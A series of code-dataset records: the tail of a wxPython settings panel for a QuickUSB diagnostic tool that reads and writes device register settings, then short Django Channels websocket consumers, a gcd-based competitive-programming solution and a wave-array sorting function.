Value', 'Bit 1: PC[1] Value',\n 'Bit 2: PC[2] Value', 'Bit 3: PC[3] Value', 'Bit 4: PC[4] Value',\n 'Bit 5: PC[5] Value', 'Bit 6: PC[6] Value', 'Bit 7: PC[7] Value'],\n value=0)\n self.btsPORTCL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTCL)\n\n self.btsPORTEH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTEH, label='OEE', name='btsPORTEH',\n parent=self.pSettings, pos=wx.Point(4, 264), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=13,\n tooltips=['Bit 0: PE[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PE[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PE[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PE[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PE[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 
'Bit 5: PE[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PE[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PE[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTEH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTEH)\n\n self.btsVERSIONSPEEDL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDL, label='VERSIONSPEED',\n name='btsVERSIONSPEEDL', parent=self.pSettings, pos=wx.Point(264,\n 344), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=17, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: USB Bus Speed\\n 0 - Full-Speed (12 Mbps)\\n 1 - High-Speed (480 Mbps)'],\n value=0)\n self.btsVERSIONSPEEDL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDL)\n self.btsVERSIONSPEEDL.SetMinSize((-1, -1))\n\n self.btsDATAADDRESSH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSDATAADDRESSH, label='DataAddress',\n name='btsDATAADDRESSH', parent=self.pSettings, pos=wx.Point(4,\n 44), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=2, tooltips=['Bit 0: GPIFADR[8]', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved',\n 'Bit 6: Disable Address Bus\\n 0 - Enable address bus\\n 1 - Disable address bus',\n \"Bit 7: Disable Auto-Increment of Address Bus\\n 0 - Auto-increment address bus\\n 1 - Don't auto-increment address bus\"],\n value=0)\n self.btsDATAADDRESSH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSDATAADDRESSH)\n\n self.btsVERSIONSPEEDH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDH, label='VERSIONSPEED',\n name='btsVERSIONSPEEDH', parent=self.pSettings, pos=wx.Point(4,\n 344), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=17,\n tooltips=['Bit 0: HARDWAREREV[0]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 1: HARDWAREREV[1]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 2: HARDWAREREV[2]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 3: HARDWAREREV[3]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 4: HARDWAREREV[4]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 5: HARDWAREREV[5]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 6: HARDWAREREV[6]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 7: HARDWAREREV[7]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E'],\n value=0)\n self.btsVERSIONSPEEDH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDH)\n self.btsVERSIONSPEEDH.SetMinSize((-1, -1))\n\n self.btsDATAADDRESSL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSDATAADDRESSL, label='DataAddress',\n name='btsDATAADDRESSL', parent=self.pSettings, pos=wx.Point(264,\n 44), showlabel=True, size=wx.Size(244, 18), 
style=wx.NO_BORDER,\n tagint=2, tooltips=['Bit 0: GPIFADR[0] - GPIF Adddress Bit 0',\n 'Bit 1: GPIFADR[1] - GPIF Adddress Bit 1',\n 'Bit 2: GPIFADR[2] - GPIF Adddress Bit 2',\n 'Bit 3: GPIFADR[3] - GPIF Adddress Bit 3',\n 'Bit 4: GPIFADR[4] - GPIF Adddress Bit 4',\n 'Bit 5: GPIFADR[5] - GPIF Adddress Bit 5',\n 'Bit 6: GPIFADR[6] - GPIF Adddress Bit 6',\n 'Bit 7: GPIFADR[7] - GPIF Adddress Bit 7'], value=0)\n self.btsDATAADDRESSL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSDATAADDRESSL)\n\n self.btsFIFOCONFIGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGH, label='FifoPinPolar',\n name='btsFIFOCONFIGH', parent=self.pSettings, pos=wx.Point(4, 64),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=3,\n tooltips=['Bit 0: FF - FIFO Full Flag Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 1: EF - FIFO Empty Flag Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 2: SLWR - FIFO Write Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 3: SLRD - FIFO Read Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 4: SLOE - FIFO Output Enable Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 5: PKTEND - FIFO Packet End Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 6: Reserved', 'Bit 7: Reserved'], value=0)\n self.btsFIFOCONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGH)\n\n self.btsFIFOCONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGL, label='IFCONFIG',\n name='btsFIFOCONFIGL', parent=self.pSettings, pos=wx.Point(264,\n 64), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=3,\n tooltips=['Bit 0: IFCFG[0] - HSPP Configuration Bit 0\\n 00 - IO ports\\n 01 - Reserved\\n 10 - GPIF master mode\\n 11 - Slave FIFO mode',\n 'Bit 1: IFCFG[1] - HSPP Configuration Bit 1\\n 00 - IO ports\\n 01 - Reserved\\n 10 - GPIF master mode\\n 11 - Slave FIFO mode',\n 'Bit 2: Reserved',\n 'Bit 3: ASYNC - GPIF Clock Mode Select\\n 0 - Synchronous\\n 1 - Asynchronous',\n 'Bit 4: IFCLKPOL - IFCLK Polarity Select\\n 0 - Normal\\n 1 - Inverted',\n 'Bit 5: IFCLKOE - IFCLK Output Enable\\n 0 - Tri-state the IFCLK pin\\n 1 - Drive the IFCLK pin',\n 'Bit 6: 3048MHZ - IFCLK Speed Select\\n 0 - 30 MHz\\n 1 - 48 MHz',\n 'Bit 7: IFCLKSRC - IFCLK Source\\n 0 - External\\n 1 - Internal'],\n value=0)\n self.btsFIFOCONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGL)\n\n self.btsI2CTLH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSI2CTLH, label='I2CTL', name='btsI2CTLH',\n parent=self.pSettings, pos=wx.Point(4, 164), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=8,\n tooltips=['Bit 0: Last I2C Read Status Bit 0\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 1: Last I2C Read Status Bit 1\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 2: Last I2C Read Status Bit 2\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 3: Last I2C Read Status Bit 3\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 4: Last I2C Read Status Bit 4\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 5: 
Last I2C Read Status Bit 5\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 6: Last I2C Read Status Bit 6\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 7: Last I2C Read Status Bit 7\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout'],\n value=0)\n self.btsI2CTLH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSI2CTLH)\n\n self.btsFPGATYPEL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFPGATYPEL, label='FPGATYPE',\n name='btsFPGATYPEL', parent=self.pSettings, pos=wx.Point(264, 84),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=4,\n tooltips=['Bit 0: FPGATYPE\\n 0 - Altera (Passive Serial)\\n 1 - Xilinx (Slave Serial)',\n 'Bit 1: Reserved', 'Bit 2: Reserved', 'Bit 3: Reserved',\n 'Bit 4: Reserved', 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: Reserved'], value=0)\n self.btsFPGATYPEL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFPGATYPEL)\n\n self.btsEP26CONFIGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSEP26CONFIGH, label='EP2CFG',\n name='btsEP26CONFIGH', parent=self.pSettings, pos=wx.Point(4, 4),\n showlabel=True, size=wx.Size(206, 18), style=wx.NO_BORDER,\n tagint=0,\n tooltips=['Bit 0: EP2 Buffering[0]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 1: EP2 Buffering[1]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 2: Reserved',\n 'Bit 3: EP2 Buffer Size\\n 0 - 512 bytes\\n 1 - 1024 bytes',\n 'Bit 4: EP2 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 5: EP2 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 6: EP2 Direction\\n 0 - Output\\n 1 - Input',\n 'Bit 7: EP2 Valid\\n 0 - Not activated\\n 1 - Activated'],\n value=0)\n self.btsEP26CONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSEP26CONFIGH)\n\n self.btsVERSIONBUILDL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDL, label='VERSIONBUILD',\n name='btsVERSIONBUILDL', parent=self.pSettings, pos=wx.Point(264,\n 324), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=16, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsVERSIONBUILDL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDL)\n\n self.btsI2CTLL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSI2CTLL, label='I2CTL', name='btsI2CTLL',\n parent=self.pSettings, pos=wx.Point(264, 164), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=8,\n tooltips=['Bit 0: I2C Bus Clock Speed\\n 0 - Appoximately 100 kHz\\n 1 - Appoximately 400 kHz',\n 'Bit 1: Reserved', 'Bit 2: Reserved', 'Bit 3: Reserved',\n 'Bit 4: Reserved', 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: IgnoreACK\\n 0 - Handle ACK for normal I2C traffic\\n 1 - Process I2C traffic regardless of ACK'],\n value=0)\n self.btsI2CTLL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSI2CTLL)\n\n self.btsFPGATYPEH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFPGATYPEH, label='FPGATYPE',\n name='btsFPGATYPEH', parent=self.pSettings, pos=wx.Point(4, 84),\n showlabel=True, 
size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=4, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsFPGATYPEH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFPGATYPEH)\n\n self.btsEP26CONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSEP26CONFIGL, label='EP6CFG',\n name='btsEP26CONFIGL', parent=self.pSettings, pos=wx.Point(302,\n 4), showlabel=True, size=wx.Size(206, 18), style=wx.NO_BORDER,\n tagint=0,\n tooltips=['Bit 0: EP6 Buffering[0]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 1: EP6 Buffering[1]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 2: Reserved',\n 'Bit 3: EP6 Buffer Size\\n 0 - 512 bytes\\n 1 - 1024 bytes',\n 'Bit 4: EP6 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 5: EP6 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 6: EP6 Direction\\n 0 - Output\\n 1 - Input',\n 'Bit 7: EP6 Valid\\n 0 - Not activated\\n 1 - Activated'],\n value=0)\n self.btsEP26CONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSEP26CONFIGL)\n\n self.btsVERSIONBUILDH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDH, label='VERSIONBUILD',\n name='btsVERSIONBUILDH', parent=self.pSettings, pos=wx.Point(4,\n 324), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=16, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsVERSIONBUILDH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDH)\n\n self.btsPORTBL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTBL, label='IOB', name='btsPORTBL',\n parent=self.pSettings, pos=wx.Point(264, 204), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=10,\n tooltips=['Bit 0: PB[0] Value', 'Bit 1: PB[1] Value',\n 'Bit 2: PB[2] Value', 'Bit 3: PB[3] Value', 'Bit 4: PB[4] Value',\n 'Bit 5: PB[5] Value', 'Bit 6: PB[6] Value', 'Bit 7: PB[7] Value'],\n value=0)\n self.btsPORTBL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTBL)\n\n self.btsPORTBH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTBH, label='OEB', name='btsPORTBH',\n parent=self.pSettings, pos=wx.Point(4, 204), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=10,\n tooltips=['Bit 0: PB[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PB[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PB[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PB[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PB[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PB[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PB[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PB[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTBH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTBH)\n\n self._init_sizers()\n\n def __init__(self, parent, id, pos, size, style, name):\n#-------------------------------------------------------------------------------\n self._init_ctrls(parent)\n \n # By default, this panel is used to access QuickUSB settings (instead of\n # defaults)\n self._useAsSettings = True\n\n\n\n def UseAsDefaults(self, defaults=True):\n 
\"\"\"\n Method to set the use of this panel to defaults instead of settings\n \"\"\"\n self._useAsSettings = not defaults\n self.sbSettings.SetLabel('Defaults')\n \n \n \n def SetControlMinSizes(self):\n \"\"\"\n This method sets the minimum size of all the BitTwiddler controls on the\n panel based on the size of the largest BitTwiddler. This ensures that\n all of the BT's line up correctly as they do not play nicely with sizers\n quite yet.\n \"\"\"\n wH, wL = 0, 0\n h = 0\n for settingH, settingL, setting in self.GetSettings():\n wsH, hsH = settingH.GetSize()\n wsL, hsL = settingL.GetSize()\n wH = max(wH, wsH)\n wL = max(wL, wsL)\n h = max(h, hsH, hsL)\n \n for settingH, settingL, setting in self.GetSettings():\n settingH.SetMinSize((wH, h))\n settingL.SetMinSize((wL, h))\n self.pSettings.Layout()\n \n \n \n def GetSettings(self):\n \"\"\"\n Return an iterable list of 3-element tuples of all the settings. The\n list has the form:\n [(BitTwiddlerObjH, BitTwiddlerObjL, QuickUsb.Setting), ...]\n \"\"\"\n settings = self.GetDefaults()\n settings.extend([(self.btsVERSIONBUILDH, self.btsVERSIONBUILDL, Setting.VersionBuild),\n (self.btsVERSIONSPEEDH, self.btsVERSIONSPEEDL, Setting.VersionSpeed)])\n return settings\n \n \n \n def GetDefaults(self):\n \"\"\"\n Return an iterable list of 3-element tuples of all the defaults. The\n list has the form:\n [(BitTwiddlerObjH, BitTwiddlerObjL, QuickUsb.Setting), ...]\n \"\"\"\n return [(self.btsEP26CONFIGH, self.btsEP26CONFIGL, Setting.Ep26Config), \n (self.btsWORDWIDEH, self.btsWORDWIDEL, Setting.WordWide),\n (self.btsDATAADDRESSH, self.btsDATAADDRESSL, Setting.DataAddress),\n (self.btsFIFOCONFIGH, self.btsFIFOCONFIGL, Setting.FifoConfig),\n (self.btsFPGATYPEH, self.btsFPGATYPEL, Setting.FpgaType),\n (self.btsCPUCONFIGH, self.btsCPUCONFIGL, Setting.CpuConfig),\n (self.btsSPICONFIGH, self.btsSPICONFIGL, Setting.SpiConfig),\n (self.btsSLAVEFIFOFLAGSH, self.btsSLAVEFIFOFLAGSL, Setting.SlaveFifoFlags),\n (self.btsI2CTLH, self.btsI2CTLL, Setting.I2Ctl),\n (self.btsPORTAH, self.btsPORTAL, Setting.PortA),\n (self.btsPORTBH, self.btsPORTBL, Setting.PortB),\n (self.btsPORTCH, self.btsPORTCL, Setting.PortC),\n (self.btsPORTDH, self.btsPORTDL, Setting.PortD),\n (self.btsPORTEH, self.btsPORTEL, Setting.PortE),\n (self.btsPORTACCFGH, self.btsPORTACCFGL, Setting.PortACCfg),\n (self.btsPINFLAGSH, self.btsPINFLAGSL, Setting.PinFlags)]\n \n \n \n def UpdateCtrlsEnable(self, ena):\n \"\"\"\n Called by frameMain when we need to update which controls are enabled \n and disabled\n \"\"\"\n self.btsVERSIONBUILDH.Enable(ena and self._useAsSettings)\n self.btsVERSIONBUILDL.Enable(ena and self._useAsSettings)\n \n self.btsVERSIONSPEEDH.Enable(ena and self._useAsSettings)\n self.btsVERSIONSPEEDL.Enable(ena and self._useAsSettings)\n\n self.btsSLAVEFIFOFLAGSH.Enable(ena and self._useAsSettings)\n self.btsSLAVEFIFOFLAGSL.Enable(ena and self._useAsSettings)\n \n \n \n def UpdateCtrls(self, qusb):\n \"\"\"\n Called by frameMain when we need to update the values within our \n controls\n \"\"\"\n if self._useAsSettings:\n self.TheFrame.SetStatus('Reading settings...')\n settings = self.GetSettings()\n else:\n self.TheFrame.SetStatus('Reading defaults...')\n settings = self.GetDefaults()\n \n # Iterate through all settings/defaults\n for valueCtrlH, valueCtrlL, setting in settings:\n if self._useAsSettings:\n # Read the setting\n (ok, value) = qusb.ReadSetting(setting)\n if not ok:\n self.TheFrame.SetStatus(\"ReadSetting() failed with error: \" + str(Error(qusb.LastError())))\n 
return\n            else:\n                # Read the default\n                (ok, value) = qusb.ReadDefault(setting)\n                if not ok:\n                    self.TheFrame.SetStatus(\"ReadDefault() failed with error: \" + str(Error(qusb.LastError())))\n                    return\n            \n            # Extract the MSB and LSB\n            valueH = (value >> 8) & 0xff\n            valueL = (value & 0xff)\n            \n            # Update the BitTwiddler controls\n            valueCtrlH.SetValue(valueH)\n            valueCtrlL.SetValue(valueL)\n    \n    \n    \n    \n    def PeriodicUpdateCtrls(self, qusb):\n        \"\"\"\n        Called by frameMain when we are to refresh our controls with values\n        read off the QuickUSB Module\n        \"\"\"\n        if self._useAsSettings:\n            self.UpdateCtrls(qusb)\n\n    \n    \n    def LoadConf(self, conf):\n        \"\"\"Called by frameMain when we are to load our configuration settings\"\"\"\n        pass\n    \n    \n    \n    def SaveConf(self):\n        \"\"\"Called by frameMain when we are to save our configuration settings\"\"\"\n        return {}\n\n\n\n    def OnBtsCheckbox(self, event):\n        \"\"\"\n        Event handler for all of the BitTwiddler controls\n        \"\"\"\n        # Ensure that a valid module is selected\n        qusb = self.TheFrame.GetSelectedModule()\n        if not qusb:\n            return\n\n        # The event object holds a reference to the actual BitTwiddler control\n        # that was checked\n        obj = event.GetEventObject()\n        \n        # The tag int holds the QuickUsb.Setting value for the BT, and the value\n        # holds the new value of the BT object\n        TagInt, Value = obj.GetTagInt(), obj.GetValue()\n        \n        # Locate the setting that was clicked\n        if self._useAsSettings:\n            settings = self.GetSettings()\n        else:\n            settings = self.GetDefaults()\n        \n        # Iterate over all settings/defaults to locate the BT that was clicked\n        for valueCtrlH, valueCtrlL, setting in settings:\n            # Check if this was our BT\n            if (valueCtrlH is obj) or (valueCtrlL is obj):\n                # Create the setting word from the MSB and LSB bytes\n                valueH, valueL = valueCtrlH.GetValue(), valueCtrlL.GetValue()\n                value = (valueH << 8) | valueL\n                \n                # Write the setting/default\n                if self._useAsSettings:\n                    (ok,) = qusb.WriteSetting(setting, value)\n                    if not ok:\n                        self.TheFrame.SetStatus(\"WriteSetting() failed with error: \" + str(Error(qusb.LastError())))\n                        return\n                else:\n                    (ok,) = qusb.WriteDefault(setting, value)\n                    if not ok:\n                        self.TheFrame.SetStatus(\"WriteDefault() failed with error: \" + str(Error(qusb.LastError())))\n                        return\n                \n                # If our global setting says we should perform reads after\n                # writes\n                if self.TheFrame._performReadBack:\n                    # Wait a little before reading back the setting to make sure\n                    # that it took\n                    time.sleep(0.01)\n                    \n                    # Read the setting back\n                    if self._useAsSettings:\n                        (ok, value) = qusb.ReadSetting(setting)\n                        if not ok:\n                            self.TheFrame.SetStatus(\"ReadSetting() failed with error: \" + str(Error(qusb.LastError())))\n                            return\n                    else:\n                        (ok, value) = qusb.ReadDefault(setting)\n                        if not ok:\n                            self.TheFrame.SetStatus(\"ReadDefault() failed with error: \" + str(Error(qusb.LastError())))\n                            return\n                    \n                    # Extract the MSB and LSB\n                    valueH = (value >> 8) & 0xff\n                    valueL = (value & 0xff)\n                    \n                    # Update the BitTwiddler controls\n                    valueCtrlH.SetValue(valueH)\n                    valueCtrlL.SetValue(valueL)\n                \n                break\n","sub_path":"Drivers/Linux/Installer_Files/Samples/Python/QuickUsbDiagPy/panelSettings.py","file_name":"panelSettings.py","file_ext":"py","file_size_in_byte":50229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
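# A minimal sketch (not a dataset record) of the 16-bit word packing that
# panelSettings.UpdateCtrls and OnBtsCheckbox above rely on: the two 8-bit
# BitTwiddler values are combined into one setting word before a write, and
# split back into MSB/LSB after a read-back. Plain Python, no wx required.
valueH, valueL = 0x12, 0xAB
value = (valueH << 8) | valueL          # 0x12ab: MSB in bits 15-8, LSB in bits 7-0
assert (value >> 8) & 0xff == valueH    # extract the MSB
assert value & 0xff == valueL           # extract the LSB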
+{"seq_id":"388405801","text":"from channels.sessions import channel_session\nfrom channels import Group\nfrom urllib.parse import urlparse, parse_qs\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\n\n@channel_session\ndef ws_connect(message):\n\tquery_parameters = parse_qs(message.content['query_string'])\n\tmachine_id = query_parameters['id'][0]\n\tGroup(machine_id).add(message.reply_channel)\n\tmessage.channel_session['id'] = machine_id\n\tmessage.reply_channel.send({'text': 'In ws_connect'})\n\n@channel_session\ndef ws_receive(message):\n\tprint(\"In ws_receive\")\n\tgroup = Group(message.channel_session['id'])\n\tmessage.reply_channel.send({'text': 'In ws_receive'})\n\tgroup.send({\n\t\t\"text\": message.content['text'],\n\t})\n\ndef ws_disconnect(message):\n\tprint(\"In ws_disconnect\")\n\tmessage.reply_channel.send({'text': 'In ws_disconnect'})","sub_path":"operator_app/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"222470954","text":"# efficient solution\nt=int(input())\nl=[]\nfor i in range(t):\n    n=int(input())\n    l.append(n//2)\nprint(*l,sep='\\n')\n\n\n\n'''\n# exceeds time limit\ndef gcdfunc(a,b): \n    if(b==0): \n        return a \n    else: \n        return gcdfunc(b,a%b)\nt=int(input())\na=[]\nfor k in range(t):\n    n=int(input())\n    l=[]\n    for i in range(1,n-1):\n        for j in range(1,n):\n            if(i<j):\n                l.append(gcdfunc(i,j))\n    a.append(max(l))\nprint(*a,sep='\\n')\n'''","sub_path":"","file_name":"","file_ext":"py","program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"","text":"# Given an array of integers, sort the array into a wave-like array:\n# a[0] >= a[1] <= a[2] >= a[3] <= a[4] >= a[5] ...\n\ndef swap(lst, index1, index2):\n    lst[index1], lst[index2] = lst[index2], lst[index1]\n\ndef wave_array(integers):\n    for index in range(0, len(integers)-1, 2):\n        if integers[index] < integers[index+1]:\n            swap(integers, index, index+1)\n    \n    for index in range(1, len(integers)-1, 2):\n        if integers[index] > integers[index+1]:\n            swap(integers, index, index+1)\n    return integers\n\nif __name__ == '__main__':\n    integers = [1, 2, 3, 4, 5]\n    wave_array(integers)\n    print(integers, [2, 1, 4, 3, 5])\n","sub_path":"InterviewBit/wave-array.py","file_name":"wave-array.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
